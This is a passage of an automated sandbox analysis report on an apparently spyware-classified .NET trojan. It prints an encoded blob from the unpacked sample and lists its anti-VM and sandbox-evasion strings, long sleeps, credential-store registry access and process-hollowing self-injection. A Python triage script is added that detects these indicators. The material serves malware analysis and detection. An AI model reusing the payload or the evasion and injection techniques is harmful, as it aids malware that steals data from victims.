                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csBase64 encoded string:
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, frmlogin.cs Base64 encoded string: (long Base64 blob omitted)
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, frmlogin.cs Base64 encoded string: (long Base64 blob omitted)
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/3@88/2
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 5_2_0040650A
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 5_2_0040434D
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Conan Fegan - Aluminium.exe.log
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                  Source: Conan Fegan - Aluminium.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: unknown Process created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe 'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe'
                  Source: unknown Process created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Process created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                  Source: Conan Fegan - Aluminium.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Conan Fegan - Aluminium.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                  Data Obfuscation:

                  .NET source code contains potential unpacker
                  Source: Conan Fegan - Aluminium.exe, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Yara detected aPLib compressed binary
                  Source: Yara match File source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara match File source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara match File source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 0_2_07A365E8 push esp; retf 0_2_07A365E9
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 0_2_07A3E9FD push FFFFFF8Bh; iretd 0_2_07A3E9FF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
                  Source: initial sample Static PE information: section name: .text entropy: 7.26782540442
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Process information set: NOGPFAULTERRORBOX

                  Malware Analysis System Evasion:

                  Yara detected AntiVM_3
                  Source: Yara match File source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara match File source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 3716 Thread sleep time: -103082s >= -30000s
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 684 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 4600 Thread sleep time: -960000s >= -30000s
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: vmware
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h] 5_2_0040317B
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap, 5_2_00402B7C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe, Memory written: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe, Process created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmp, Binary or memory string: Program Manager
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmp, Binary or memory string: Progman
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
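                  The two behaviours worth pulling out of entries like the ones above are the sandbox evasion (Sandboxie's SbieDll.dll, the Wine-only wine_get_unix_file_name export, the VMware display adapter and VMware Tools strings, and sleeps far above the 30000 threshold) and the self-injection (the sample spawns a copy of itself and writes a buffer beginning with 4D5A, the "MZ" PE signature, at base 400000, the default image base of 32-bit executables, which is the RunPE / process-hollowing pattern). The Python below is an added triage example, not part of this report or of any sandbox's tooling. It parses constructed lines in the shape of the entries above (sample.exe stands in for the real path) and flags evasive sleeps, anti-VM strings and PE writes into a child copy of the same image. One assumption it makes: the sleep values are read as milliseconds, which is consistent with 922337203685477 being TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10000), i.e. an indefinite sleep that a sandbox has to skip rather than wait out.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10,000 ticks per ms.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

# Lower-cased substrings the report lists as sandbox / VM detection markers.
ANTI_VM_MARKERS = {
    "sbiedll.dll": "Sandboxie hook DLL",
    "wine_get_unix_file_name": "Wine-only kernel32 export",
    "vmware svga ii": "VMware virtual display adapter",
    "vmware tools": "VMware Tools install path / registry key",
}

SLEEP_RE = re.compile(r"Thread sleep time: -?(\d+)s >= -?(\d+)s")
STRING_RE = re.compile(r"Binary or memory string: (.+)$")
PROC_RE = re.compile(r"Process created: (?P<image>.+?\.exe) (?P<cmdline>.+)$", re.I)
MEMWRITE_RE = re.compile(
    r"Memory written: (?P<target>.+?\.exe) base: (?P<base>[0-9a-f]+) "
    r"value starts with: (?P<magic>[0-9a-f]+)", re.I)


@dataclass
class Findings:
    evasive_sleeps: List[Tuple[int, str]] = field(default_factory=list)  # (ms, label)
    anti_vm: List[Tuple[str, str]] = field(default_factory=list)         # (string, meaning)
    self_spawned: List[str] = field(default_factory=list)                # images that spawned themselves
    pe_writes: List[Tuple[str, int]] = field(default_factory=list)       # (target image, base address)

    def process_hollowing(self) -> bool:
        """An MZ-headed image written into a child copy of the same executable (RunPE-style)."""
        return any(target in self.self_spawned for target, _ in self.pe_writes)


def classify_sleep(ms: int, threshold_ms: int) -> Optional[str]:
    """Label a requested sleep; None means it is below the sandbox's own threshold."""
    if ms >= TIMESPAN_MAX_MS:
        return "indefinite (TimeSpan.MaxValue)"
    if ms >= threshold_ms:
        return f"long ({ms // 1000}s)"
    return None


def analyze(lines: List[str]) -> Findings:
    """Walk report-style lines once and collect the evasion and injection indicators."""
    f = Findings()
    for line in lines:
        line = line.strip()
        if m := SLEEP_RE.search(line):
            ms, threshold = int(m.group(1)), int(m.group(2))
            if label := classify_sleep(ms, threshold):
                f.evasive_sleeps.append((ms, label))
        elif m := STRING_RE.search(line):
            s = m.group(1)
            for marker, meaning in ANTI_VM_MARKERS.items():
                if marker in s.lower():
                    f.anti_vm.append((s, meaning))
        elif m := PROC_RE.search(line):
            image, cmdline = m.group("image"), m.group("cmdline").strip('"')
            if cmdline.lower().startswith(image.lower()):  # child is a copy of the parent image
                f.self_spawned.append(image)
        elif m := MEMWRITE_RE.search(line):
            if m.group("magic").upper().startswith("4D5A"):  # "MZ": a PE header is being written
                f.pe_writes.append((m.group("target"), int(m.group("base"), 16)))
    return f


# Constructed sample in the shape of the report's entries (not the sandbox's raw log format).
EXE = r"C:\Users\user\Desktop\sample.exe"
SAMPLE_REPORT = [
    f"Source: {EXE} TID: 3716 Thread sleep time: -103082s >= -30000s",
    f"Source: {EXE} TID: 684 Thread sleep time: -922337203685477s >= -30000s",
    f"Source: {EXE} TID: 4600 Thread sleep time: -960000s >= -30000s",
    "Source: sample.exe, 00000000.00000002.sdmp Binary or memory string: SBIEDLL.DLL",
    "Source: sample.exe, 00000000.00000002.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME",
    "Source: sample.exe, 00000000.00000002.sdmp Binary or memory string: VMware SVGA II",
    r"Source: sample.exe, 00000000.00000002.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools",
    "Source: sample.exe, 00000005.00000002.sdmp Binary or memory string: Program Manager",  # benign window name
    f"Source: {EXE} Memory written: {EXE} base: 400000 value starts with: 4D5A",
    f"Source: {EXE} Process created: {EXE} {EXE}",
]

if __name__ == "__main__":
    found = analyze(SAMPLE_REPORT)
    for ms, label in found.evasive_sleeps:
        print(f"evasive sleep: {ms} ms, {label}")
    for s, meaning in found.anti_vm:
        print(f"anti-VM string: {s!r} ({meaning})")
    for target, base in found.pe_writes:
        print(f"PE image written into {target} at 0x{base:X}")
    print("process hollowing pattern:", found.process_hollowing())
```

                  The hollowing check deliberately does not depend on the order of the two lines: the report lists the memory write before the process creation, so the script collects both and correlates them afterwards. The "Program Manager" line is kept in the sample to show that ordinary window-class strings found in the same dump do not trip the anti-VM marker list.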
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe, Queries volume information (VolumeInformation) for each of the following files:
                    C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                    C:\Windows\Fonts\arial.ttf
                    C:\Windows\Fonts\ariali.ttf
                    C:\Windows\Fonts\arialbd.ttf
                    C:\Windows\Fonts\arialbi.ttf
                    C:\Windows\Fonts\ARIALN.TTF
                    C:\Windows\Fonts\ariblk.ttf
                    C:\Windows\Fonts\ARIALNI.TTF
                    C:\Windows\Fonts\ARIALNB.TTF
                    C:\Windows\Fonts\ARIALNBI.TTF
                    C:\Windows\Fonts\bahnschrift.ttf
                    C:\Windows\Fonts\calibri.ttf
                    C:\Windows\Fonts\calibril.ttf
                    C:\Windows\Fonts\calibrii.ttf
                    C:\Windows\Fonts\calibrili.ttf
                    C:\Windows\Fonts\calibrib.ttf
                    C:\Windows\Fonts\calibriz.ttf
                    C:\Windows\Fonts\cambria.ttc
                    C:\Windows\Fonts\cambriai.ttf
                    C:\Windows\Fonts\cambriab.ttf
                    C:\Windows\Fonts\cambriaz.ttf
                    C:\Windows\Fonts\Candara.ttf
                    C:\Windows\Fonts\Candarai.ttf
                    C:\Windows\Fonts\Candarab.ttf
                    C:\Windows\Fonts\Candaraz.ttf
                    C:\Windows\Fonts\comic.ttf
                    C:\Windows\Fonts\comici.ttf
                    C:\Windows\Fonts\comicbd.ttf
                    C:\Windows\Fonts\comicz.ttf
                    C:\Windows\Fonts\consola.ttf
                    C:\Windows\Fonts\consolai.ttf
                    C:\Windows\Fonts\consolab.ttf
                    C:\Windows\Fonts\consolaz.ttf
                    C:\Windows\Fonts\constan.ttf
                    C:\Windows\Fonts\constani.ttf
                    C:\Windows\Fonts\constanb.ttf
                    C:\Windows\Fonts\constanz.ttf
                    C:\Windows\Fonts\corbel.ttf
                    C:\Windows\Fonts\corbeli.ttf
                    C:\Windows\Fonts\corbelb.ttf
                    C:\Windows\Fonts\corbelz.ttf
                    C:\Windows\Fonts\cour.ttf
                    C:\Windows\Fonts\couri.ttf
                    C:\Windows\Fonts\courbd.ttf
                    C:\Windows\Fonts\courbi.ttf
                    C:\Windows\Fonts\ebrima.ttf
                    C:\Windows\Fonts\ebrimabd.ttf
                    C:\Windows\Fonts\framd.ttf
                    C:\Windows\Fonts\FRADM.TTF
                    C:\Windows\Fonts\framdit.ttf
                    C:\Windows\Fonts\FRADMIT.TTF
                    C:\Windows\Fonts\FRAMDCN.TTF
                    C:\Windows\Fonts\FRADMCN.TTF
                    C:\Windows\Fonts\FRAHV.TTF
                    C:\Windows\Fonts\FRAHVIT.TTF
                    C:\Windows\Fonts\Gabriola.ttf
                    C:\Windows\Fonts\gadugi.ttf
                    C:\Windows\Fonts\gadugib.ttf
                    C:\Windows\Fonts\georgia.ttf
                    C:\Windows\Fonts\georgiai.ttf
                    C:\Windows\Fonts\georgiab.ttf
                    C:\Windows\Fonts\georgiaz.ttf
                    C:\Windows\Fonts\impact.ttf
                    C:\Windows\Fonts\Inkfree.ttf
                    C:\Windows\Fonts\javatext.ttf
                    C:\Windows\Fonts\LeelawUI.ttf
                    C:\Windows\Fonts\LeelUIsl.ttf
                    C:\Windows\Fonts\LeelaUIb.ttf
                    C:\Windows\Fonts\lucon.ttf
                    C:\Windows\Fonts\l_10646.ttf
                    C:\Windows\Fonts\malgun.ttf
                    C:\Windows\Fonts\malgunsl.ttf
                    C:\Windows\Fonts\malgunbd.ttf
                    C:\Windows\Fonts\himalaya.ttf
                    C:\Windows\Fonts\msjh.ttc
                    C:\Windows\Fonts\msjhl.ttc
                    C:\Windows\Fonts\msjhbd.ttc
                    C:\Windows\Fonts\ntailu.ttf
                    C:\Windows\Fonts\ntailub.ttf
                    C:\Windows\Fonts\phagspa.ttf
                    C:\Windows\Fonts\phagspab.ttf
                    C:\Windows\Fonts\micross.ttf
                    C:\Windows\Fonts\taile.ttf
                    C:\Windows\Fonts\taileb.ttf
                    C:\Windows\Fonts\msyh.ttc
                    C:\Windows\Fonts\msyhl.ttc
                    C:\Windows\Fonts\msyhbd.ttc
                    C:\Windows\Fonts\msyi.ttf
                    C:\Windows\Fonts\mingliub.ttc
                    C:\Windows\Fonts\monbaiti.ttf
                    C:\Windows\Fonts\msgothic.ttc
                    C:\Windows\Fonts\mvboli.ttf
                    C:\Windows\Fonts\mmrtext.ttf
                    C:\Windows\Fonts\mmrtextb.ttf
                    C:\Windows\Fonts\Nirmala.ttf
                    C:\Windows\Fonts\NirmalaS.ttf
                    C:\Windows\Fonts\NirmalaB.ttf
                    C:\Windows\Fonts\pala.ttf
                    C:\Windows\Fonts\palai.ttf
                    C:\Windows\Fonts\palab.ttf
                    C:\Windows\Fonts\palabi.ttf
                    C:\Windows\Fonts\segoepr.ttf
                    C:\Windows\Fonts\segoeprb.ttf
                    C:\Windows\Fonts\segoesc.ttf
                    C:\Windows\Fonts\segoescb.ttf
                    C:\Windows\Fonts\seguiemj.ttf
                    C:\Windows\Fonts\seguihis.ttf
                    C:\Windows\Fonts\seguisym.ttf
                    C:\Windows\Fonts\simsun.ttc
                    C:\Windows\Fonts\simsunb.ttf
                    C:\Windows\Fonts\Sitka.ttc
                    C:\Windows\Fonts\SitkaI.ttc
                    C:\Windows\Fonts\SitkaB.ttc
                    C:\Windows\Fonts\SitkaZ.ttc
                    C:\Windows\Fonts\sylfaen.ttf
                    C:\Windows\Fonts\symbol.ttf
                    C:\Windows\Fonts\tahoma.ttf
                    C:\Windows\Fonts\tahomabd.ttf
                    C:\Windows\Fonts\trebuc.ttf
                    C:\Windows\Fonts\trebucit.ttf
                    C:\Windows\Fonts\trebucbd.ttf
                    C:\Windows\Fonts\trebucbi.ttf
                    C:\Windows\Fonts\verdana.ttf
                    C:\Windows\Fonts\verdanai.ttf
                    C:\Windows\Fonts\verdanab.ttf
                    C:\Windows\Fonts\verdanaz.ttf
                    C:\Windows\Fonts\webdings.ttf
                    C:\Windows\Fonts\wingding.ttf
                    C:\Windows\Fonts\YuGothR.ttc
                    C:\Windows\Fonts\YuGothM.ttc
                    C:\Windows\Fonts\YuGothL.ttc
                    C:\Windows\Fonts\YuGothB.ttc
                    C:\Windows\Fonts\holomdl2.ttf
                    C:\Windows\Fonts\CENTURY.TTF
                    C:\Windows\Fonts\LEELAWAD.TTF
                    C:\Windows\Fonts\LEELAWDB.TTF
                    C:\Windows\Fonts\MSUIGHUR.TTF
                    C:\Windows\Fonts\MSUIGHUB.TTF
                    C:\Windows\Fonts\WINGDNG2.TTF
                    C:\Windows\Fonts\WINGDNG3.TTF
                    C:\Windows\Fonts\TEMPSITC.TTF
                    C:\Windows\Fonts\PRISTINA.TTF
                    C:\Windows\Fonts\PAPYRUS.TTF
                    C:\Windows\Fonts\MISTRAL.TTF
                    C:\Windows\Fonts\LHANDW.TTF
                    C:\Windows\Fonts\ITCKRIST.TTF
                    C:\Windows\Fonts\JUICE___.TTF
                    C:\Windows\Fonts\FRSCRIPT.TTF
                    C:\Windows\Fonts\FREESCPT.TTF
                    C:\Windows\Fonts\BRADHITC.TTF
                    C:\Windows\Fonts\OUTLOOK.TTF
                    C:\Windows\Fonts\BKANT.TTF
                    C:\Windows\Fonts\ANTQUAI.TTF
                    C:\Windows\Fonts\ANTQUAB.TTF
                    C:\Windows\Fonts\ANTQUABI.TTF
                    C:\Windows\Fonts\GARA.TTF
                    C:\Windows\Fonts\GARAIT.TTF
                    C:\Windows\Fonts\GARABD.TTF
                    C:\Windows\Fonts\MTCORSVA.TTF
                    C:\Windows\Fonts\GOTHIC.TTF
                    C:\Windows\Fonts\GOTHICI.TTF
                    C:\Windows\Fonts\GOTHICB.TTF
                    C:\Windows\Fonts\GOTHICBI.TTF
                    C:\Windows\Fonts\ALGER.TTF
                    C:\Windows\Fonts\BASKVILL.TTF
                    C:\Windows\Fonts\BAUHS93.TTF
                    C:\Windows\Fonts\BELL.TTF
                    C:\Windows\Fonts\BELLI.TTF
                    C:\Windows\Fonts\BELLB.TTF
                    C:\Windows\Fonts\BRLNSR.TTF
                    C:\Windows\Fonts\BRLNSDB.TTF
                    C:\Windows\Fonts\BRLNSB.TTF
                    C:\Windows\Fonts\BERNHC.TTF
                    C:\Windows\Fonts\BOD_PSTC.TTF
                    C:\Windows\Fonts\BRITANIC.TTF
